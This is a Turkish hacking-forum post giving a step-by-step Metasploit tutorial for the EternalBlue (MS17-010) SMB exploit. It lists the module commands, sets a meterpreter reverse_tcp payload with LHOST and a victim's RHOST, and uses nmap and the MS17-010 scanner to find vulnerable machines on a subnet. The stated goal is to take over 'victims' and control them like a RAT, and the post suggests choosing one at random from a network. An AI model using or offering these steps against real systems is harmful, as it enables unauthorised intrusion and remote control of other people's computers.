Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


EternalBlue Ve Kullanımı//StringingStroke

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 4 Hafta önce   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
01/2017
Nereden
Stringia
Mesajlar
Konular

Teşekkür (Etti): 238
Teşekkür (Aldı): 58


EternalBlue Ve Kullanımı//StringingStroke



Merhaba Dostlar!

Yeni bir konu ile karşınızdayım. Remote exploitler çok merak edilen bir konu ancak nasıl yapılacağı çok bilinmiyor.EternalBlue da o exploitlerden biri. Şimdi diyorsunuzki Remote exploit ne peki?
Remote Exploit: Adından da anlaşılacağı gibi uzak sistemlere yapılan Exploit türü diyebiliriz.
Exploit nedir bilmeyenler için bu linkten ulaşabilirsiniz.
EternalBlue, herkes tarafından bilinen Wannacry saldırısına sebep olan açıktır.
Bulunan sistemlerde açık muhakkak kapatılmalıdır kötü sonuçlar çıkabilir.
Evet peki bunu nasıl kullanırız diye soracaksınız.Öncelikle size ****sploit gerekli.Kali,Parrot,backtrack gibi işletim sistemlerinde zaten yüklü gelmektedir. ****sploit nedir ve kurulumu için yine Ceys komutanımızın bu konusundan inceleyebilirsiniz.
Konumuza geçelim...
Öncelikle terminalimize gelip msfconsole yazıyoruz ardından açılana kadar bekliyoruz.

Gelen ekrana
Kod:
use exploit/windows/smb/ms17_010_eternalblue
yazıyoruz.

Ardından eğer ki ratlardaki gibi kullanmak istiyorsanız şu komutu yazın.
Kod:
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Eğer shell olarak kullanmak istiyorsanız bunu yazmanıza gerek yok.
Eğer bu payloadu yazdıysanız ardından şu komutuda girmeniz gerekli
Kod:
set LHOST ipv4_adresiniz

Evet tekrar ikisininde birleştiği yerdeyiz.
Kurbanımızın ipv4 adresini biliyorsak
Kod:
set RHOST kurabnın ipv4_adresi

eğer rastgele ağdan birini sçecekseniz veya ağdaki bilgisayarları görmek istiyorsanız farklı bir terminal açıp nmapin şu komutuyla bakabilirsiniz.
Kod:
nmap 192.168.1.0/24
Veya şu yöntemide deneyebilirsiniz:
İlk başta
Kod:
use auxiliary/scanner/smb/smb_ms17_010

diyip
Kod:
set RHOST IP_ARALIGI
Örneğin set RHOST 192.168.1.0/24
ardından run deyin.
burada beklerseniz açıklı ve açıksız makine olan ve olmayan makineleri söyleyecektir.
Ve yine RHOSTTAN sonraki yere kurbanınızı yazabilirsiniz.
Ardından exploit yazıp kurbanınızın düşmesini bekleyebilirsiniz ve aynı rat kurmuşcasına sistem üzerinde iş yapabilirsiniz.

Bende açıklı makine olmadığından gösteremeyeceğim.Ancak devamında meterpreter ekranı açılacak ve rat şeklinde kullanabileceksiniz.
NOT:
Windows 8 exploiti ayrıdır onun için
Kod:
use exploit/windows/smb/ms17_010_eternalblue_win8
ile aynı şekilde kullanabilirsiniz.




___________________________________________

Karanlıklardır yerim zira aydınlıksa seni boğar
"Veni,Vidi,Vici"


Konu StringingStroke tarafından ( 4 Hafta önce Saat 15:45 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

"Tranquila, OniOz Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau